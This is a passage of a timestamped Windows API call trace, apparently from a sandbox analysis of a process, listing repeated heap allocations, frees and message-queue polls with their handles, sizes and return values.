[0155.034] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9388 | out: hHeap=0x8a0000) returned 1 [0155.035] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x9a9d88 [0155.035] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9388 [0155.035] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9370 [0155.035] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9b5ce8 [0155.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9370 | out: hHeap=0x8a0000) returned 1 [0155.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b5ce8 | out: hHeap=0x8a0000) returned 1 [0155.035] PeekMessageW (in: lpMsg=0x87fccc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fccc) returned 0 [0155.035] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x9a9db0 [0155.035] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9370 [0155.035] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9b5ce8 [0155.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9370 | out: hHeap=0x8a0000) returned 1 [0155.035] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9becf0 [0155.035] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9370 [0155.035] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b93a0 [0155.035] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9b5cf8 [0155.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b93a0 | out: hHeap=0x8a0000) returned 1 [0155.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b5cf8 | out: hHeap=0x8a0000) returned 1 [0155.035] PeekMessageW (in: lpMsg=0x87fccc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fccc) returned 0 [0155.035] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x9a9dd8 [0155.035] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b93a0 [0155.035] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9b5cf8 [0155.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b93a0 | out: hHeap=0x8a0000) returned 1 [0155.035] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bedd0 [0155.035] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b93a0 [0155.035] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b93b8 [0155.036] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9b5d08 [0155.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b93b8 | out: hHeap=0x8a0000) returned 1 [0155.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b5d08 | out: hHeap=0x8a0000) returned 1 [0155.036] PeekMessageW (in: lpMsg=0x87fccc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fccc) returned 0 [0155.036] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x9a9e00 [0155.036] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b93b8 [0155.036] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9b5d08 [0155.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b93b8 | out: hHeap=0x8a0000) returned 1 [0155.036] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bee08 [0155.036] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b93b8 [0155.036] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b93d0 [0155.036] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9b5d18 [0155.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b93d0 | out: hHeap=0x8a0000) returned 1 [0155.036] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x9a9e28 [0155.036] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b93d0 [0155.036] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9b5d28 [0155.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b5d28 | out: hHeap=0x8a0000) returned 1 [0155.036] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b93e8 [0155.036] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9b5d28 [0155.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b5d28 | out: hHeap=0x8a0000) returned 1 [0155.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b93d0 | out: hHeap=0x8a0000) returned 1 [0155.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b93e8 | out: hHeap=0x8a0000) returned 1 [0155.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a9e28 | out: hHeap=0x8a0000) returned 1 [0155.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b5d18 | out: hHeap=0x8a0000) returned 1 [0155.037] PeekMessageW (in: lpMsg=0x87fccc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fccc) returned 0 [0155.037] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x9a9e28 [0155.037] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b93e8 [0155.037] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9b5d18 [0155.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b93e8 | out: hHeap=0x8a0000) returned 1 [0155.037] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x9a9e50 [0155.037] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b93e8 [0155.037] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b93d0 [0155.037] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9b5d28 [0155.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b93d0 | out: hHeap=0x8a0000) returned 1 [0155.037] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x9a9e78 [0155.037] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b93d0 [0155.037] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9b5d38 [0155.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b5d38 | out: hHeap=0x8a0000) returned 1 [0155.037] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9400 [0155.037] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9b5d38 [0155.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b5d38 | out: hHeap=0x8a0000) returned 1 [0155.037] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9418 [0155.037] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9b5d38 [0155.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b5d38 | out: hHeap=0x8a0000) returned 1 [0155.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b93d0 | out: hHeap=0x8a0000) returned 1 [0155.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9400 | out: hHeap=0x8a0000) returned 1 [0155.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9418 | out: hHeap=0x8a0000) returned 1 [0155.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a9e78 | out: hHeap=0x8a0000) returned 1 [0155.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b5d28 | out: hHeap=0x8a0000) returned 1 [0155.038] PeekMessageW (in: lpMsg=0x87fccc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fccc) returned 0 [0155.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x9a9e78 [0155.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9418 [0155.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9b5d28 [0155.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9418 | out: hHeap=0x8a0000) returned 1 [0155.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x9a9ea0 [0155.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9418 [0155.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9400 [0155.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9b5d38 [0155.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9400 | out: hHeap=0x8a0000) returned 1 [0155.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b5d38 | out: hHeap=0x8a0000) returned 1 [0155.038] PeekMessageW (in: lpMsg=0x87fccc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fccc) returned 0 [0155.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x9a9ec8 [0155.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9400 [0155.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9b5d38 [0155.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9400 | out: hHeap=0x8a0000) returned 1 [0155.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x9a9ef0 [0155.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9400 [0155.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b93d0 [0155.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9b5d48 [0155.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b93d0 | out: hHeap=0x8a0000) returned 1 [0155.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b5d48 | out: hHeap=0x8a0000) returned 1 [0155.039] PeekMessageW (in: lpMsg=0x87fccc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fccc) returned 0 [0155.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x9a9f18 [0155.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b93d0 [0155.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9b5d48 [0155.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b93d0 | out: hHeap=0x8a0000) returned 1 [0155.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x9a9f40 [0155.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b93d0 [0155.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9430 [0155.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9b5d58 [0155.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9430 | out: hHeap=0x8a0000) returned 1 [0155.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b5d58 | out: hHeap=0x8a0000) returned 1 [0155.039] PeekMessageW (in: lpMsg=0x87fccc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fccc) returned 0 [0155.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x9a9f68 [0155.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9430 [0155.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9b5d58 [0155.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9430 | out: hHeap=0x8a0000) returned 1 [0155.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x9a9f90 [0155.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9430 [0155.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9448 [0155.039] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9b5d68 [0155.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9448 | out: hHeap=0x8a0000) returned 1 [0155.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b5d68 | out: hHeap=0x8a0000) returned 1 [0155.039] PeekMessageW (in: lpMsg=0x87fccc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fccc) returned 0 [0155.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x9a9fb8 [0155.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9448 [0155.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9b5d68 [0155.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9448 | out: hHeap=0x8a0000) returned 1 [0155.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bee40 [0155.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9448 [0155.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9460 [0155.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9b5d78 [0155.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9460 | out: hHeap=0x8a0000) returned 1 [0155.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b5d78 | out: hHeap=0x8a0000) returned 1 [0155.040] PeekMessageW (in: lpMsg=0x87fccc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fccc) returned 0 [0155.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x9a9fe0 [0155.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9460 [0155.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9b5d78 [0155.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9460 | out: hHeap=0x8a0000) returned 1 [0155.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bee78 [0155.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9460 [0155.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9478 [0155.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9b5d88 [0155.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9478 | out: hHeap=0x8a0000) returned 1 [0155.040] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b5d88 | out: hHeap=0x8a0000) returned 1 [0155.040] PeekMessageW (in: lpMsg=0x87fccc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fccc) returned 0 [0155.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x9aa008 [0155.040] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9478 [0155.041] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9b5d88 [0155.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9478 | out: hHeap=0x8a0000) returned 1 [0155.041] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9beeb0 [0155.041] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9478 [0155.041] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9490 [0155.041] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9b5d98 [0155.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9490 | out: hHeap=0x8a0000) returned 1 [0155.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b5d98 | out: hHeap=0x8a0000) returned 1 [0155.041] PeekMessageW (in: lpMsg=0x87fccc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fccc) returned 0 [0155.041] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x9aa030 [0155.041] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9490 [0155.041] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9b5d98 [0155.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9490 | out: hHeap=0x8a0000) returned 1 [0155.041] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9beee8 [0155.041] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9490 [0155.041] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b94a8 [0155.041] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9b5da8 [0155.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b94a8 | out: hHeap=0x8a0000) returned 1 [0155.041] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b5da8 | out: hHeap=0x8a0000) returned 1 [0155.041] PeekMessageW (in: lpMsg=0x87fccc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fccc) returned 0 [0155.041] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x9aa058 [0155.042] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b94a8 [0155.042] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9b5da8 [0155.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b94a8 | out: hHeap=0x8a0000) returned 1 [0155.042] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x9438a8 [0155.042] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b94a8 [0155.042] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b94c0 [0155.042] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9b5db8 [0155.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b94c0 | out: hHeap=0x8a0000) returned 1 [0155.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b5db8 | out: hHeap=0x8a0000) returned 1 [0155.042] PeekMessageW (in: lpMsg=0x87fccc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fccc) returned 0 [0155.042] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x9aa080 [0155.042] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b94c0 [0155.042] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9b5db8 [0155.042] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b94c0 | out: hHeap=0x8a0000) returned 1 [0155.042] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bef20 [0155.043] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b94c0 [0155.043] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b94d8 [0155.043] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9b5dc8 [0155.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b94d8 | out: hHeap=0x8a0000) returned 1 [0155.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b5dc8 | out: hHeap=0x8a0000) returned 1 [0155.043] PeekMessageW (in: lpMsg=0x87fccc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fccc) returned 0 [0155.043] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x9aa0a8 [0155.043] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b94d8 [0155.043] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9b5dc8 [0155.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b94d8 | out: hHeap=0x8a0000) returned 1 [0155.043] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bef58 [0155.043] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b94d8 [0155.043] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b94f0 [0155.043] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9b5dd8 [0155.044] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b94f0 | out: hHeap=0x8a0000) returned 1 [0155.044] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b5dd8 | out: hHeap=0x8a0000) returned 1 [0155.044] PeekMessageW (in: lpMsg=0x87fccc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fccc) returned 0 [0155.044] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x9aa0d0 [0155.044] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b94f0 [0155.045] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9b5dd8 [0155.045] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b94f0 | out: hHeap=0x8a0000) returned 1 [0155.045] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bef90 [0155.045] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b94f0 [0155.045] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9508 [0155.045] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9b5de8 [0155.045] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9508 | out: hHeap=0x8a0000) returned 1 [0155.045] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b5de8 | out: hHeap=0x8a0000) returned 1 [0155.045] PeekMessageW (in: lpMsg=0x87fccc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fccc) returned 0 [0155.045] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x9aa0f8 [0155.045] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9508 [0155.045] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9b5de8 [0155.045] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9508 | out: hHeap=0x8a0000) returned 1 [0155.045] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8dae20 [0155.046] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9508 [0155.046] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9520 [0155.046] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9b5df8 [0155.046] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9520 | out: hHeap=0x8a0000) returned 1 [0155.046] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b5df8 | out: hHeap=0x8a0000) returned 1 [0155.046] PeekMessageW (in: lpMsg=0x87fccc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fccc) returned 0 [0155.046] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x9aa120 [0155.046] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9520 [0155.046] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9b5df8 [0155.046] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9520 | out: hHeap=0x8a0000) returned 1 [0155.046] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8dae68 [0155.046] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9520 [0155.046] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9538 [0155.046] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9b5e08 [0155.046] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9538 | out: hHeap=0x8a0000) returned 1 [0155.046] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b5e08 | out: hHeap=0x8a0000) returned 1 [0155.046] PeekMessageW (in: lpMsg=0x87fccc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fccc) returned 0 [0155.046] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x9aa148 [0155.047] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9538 [0155.047] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9b5e08 [0155.047] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9538 | out: hHeap=0x8a0000) returned 1 [0155.047] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8daeb0 